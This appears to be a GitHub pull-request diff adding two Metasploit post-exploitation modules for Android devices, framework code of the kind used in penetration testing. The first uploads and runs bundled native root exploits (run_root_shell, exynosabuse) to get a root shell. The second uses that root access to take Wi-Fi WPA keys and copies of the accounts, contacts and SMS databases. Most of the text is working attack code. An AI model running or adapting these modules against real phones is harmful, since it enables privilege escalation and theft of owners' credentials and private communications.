Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Binary file added data/android/exynosabuse
Binary file not shown.
Binary file added data/android/run_root_shell
Binary file not shown.
87 changes: 87 additions & 0 deletions modules/post/android/escalate/getsystem.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,87 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Post

include Msf::Post::Common

def initialize(info={})
super(update_info(info,
'Name' => 'Android Escalate via Native Binary',
'Description' => %q{ This module uses native binaries to attempt to get a root shell },
'License' => MSF_LICENSE,
'Author' => 'timwr',
'Platform' => [ 'android' ],
'SessionTypes' => [ 'meterpreter' ]
))

register_options([
OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-3), otherwise try them all", 0])
], self.class)

@techniques = [ 'su', 'run_root_shell', 'exynosabuse' ]
end

def use_technique(tech)
filename = @techniques[tech]

print_status("Using technique " + filename)

if tech == 0
# su is a special case for rooted devices
# this may invoke a user prompt from the superuser app
cmd = "su\n"
else
# upload the binary
localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', filename)
binary = session.fs.file.new(filename, "wb")
binary.write(File.read(localfile, {:mode => 'rb'}))
binary.close()

# execute the binary
cmd = "cd /data/data/com.metasploit.stage/files"
cmd << " && chmod 777 " + filename
cmd << " && ./" + filename + "\n"
end

# finally, check if we have root
cmd << "id\n"

# run the commands in a channel
process = session.sys.process.execute("sh", "", {'Channelized' => true})
process.channel.write(cmd)
output = process.channel.read
if output =~ /root/
print_good("got root: " + output)
return true
else
print_error(output)

# cleanup
process.channel.close
process.close
if tech != 0
session.fs.file.delete(filename)
end
return false
end
end

def run
tech = datastore['TECHNIQUE'].to_i
if tech == 0
use_technique(2)
use_technique(1)
use_technique(0)
else
use_technique(tech - 1)
end
end

end
77 changes: 77 additions & 0 deletions modules/post/android/gather/gather.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,77 @@
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit3 < Msf::Post

include Msf::Post::Common
include Msf::Post::File

def initialize(info={})
super( update_info( info,
'Name' => 'Android Gather',
'Description' => %q{ Post Module to gather from an android device },
'License' => MSF_LICENSE,
'Author' => ['timwr'],
'Platform' => [ 'android' ],
'SessionTypes' => [ 'meterpreter' ]
))
end

def run
channel = find_root_channel
if channel.nil?
print_error("no root channel")
else
store_wifi_psk(channel, "/data/misc/wifi/wpa_supplicant.conf")
db_files = ['/data/system/users/0/accounts.db',
'/data/data/com.android.providers.contacts/databases/contacts2.db',
'/data/data/com.android.providers.telephony/databases/mmssms.db', ]
db_files.each do |db_file|
store_db(channel, db_file)
end
end
end

def store_db(channel, file)
filename = ::File.basename(file)
tmp = "/data/local/tmp/db"
cmd = "[ -f #{file} ] && "
cmd << "cp #{file} #{tmp} && "
cmd << "chmod 777 #{tmp} && "
cmd << "echo 1 || "
cmd << "echo 2\n"
channel.write(cmd)
return if channel.read =~ 1

loot = read_file(tmp)
lootfile = store_loot(filename, "binary/db", session, loot, file, "Sqlite db file")
print_good("#{filename} saved at: #{lootfile.to_s}")
end

def store_wifi_psk(channel, file)
channel.write("cat #{file}\n")
loot = channel.read
loot_file = store_loot("wpa.psk", "text/plain", session, loot, file, "WPA PSK file")
print_good("wpa-psk file saved at: #{loot_file.to_s}")
end

def find_root_channel
session.channels.each_value do |ch|
ch.write("id\n")
output = ch.read
if output =~ /root/
return ch
end
end
return nil
end
end